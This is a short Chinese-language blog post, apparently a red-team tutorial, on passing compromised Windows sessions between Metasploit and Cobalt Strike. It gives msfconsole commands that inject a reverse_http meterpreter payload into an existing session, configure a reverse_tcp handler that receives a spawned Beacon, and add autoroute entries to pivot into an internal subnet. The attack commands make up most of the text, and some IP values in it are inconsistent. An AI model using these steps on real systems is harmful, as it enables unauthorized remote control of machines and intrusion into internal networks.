metasploit与Cobaltstrike互相派生shell
2020-04-10 本文已影响0人
migrate_
一. msf 派生 shell 给 Cobalt strike(前提有一个meterpreter)
- 被控端win7(64) ip:192.168.66.133
- kali linux > msf ip:192.168.66.152
- cobalt strike ip: 公网ip
msf exploit(handler) > use exploit/windows/local/payload_inject
msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST 192.168.229.143
msf exploit(payload_inject) > set LPORT 1212
msf exploit(payload_inject) > set SESSION 1
msf exploit(payload_inject) > exploit
二. Cobalt strike 派生 shell 给 MSF(前提有个beaconshell)
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.66.152 #msf ip
lhost => 192.168.1.100
msf exploit(handler) > set lport 5555 #msf port
lport => 5555
msf exploit(handler) > exploit
1.jpg
之后使用Cobalt Strike创建一个
windows/foreign/reverse_tcp Listener
其中ip为msf的ip地址,端口为msf所监听的端口。
然后选中计算机,右键->Spawn,选择刚刚创建的监听器:
msf中即可看到成功获取了meterpreter会话
2.jpg
3.jpg
run get_local_subnets
#获取内网网段
run autoroute -s 192.168.66.0/24
#添加路由
run autoroute -p
#查看添加的路由
#接下来就可以进行内网渗透了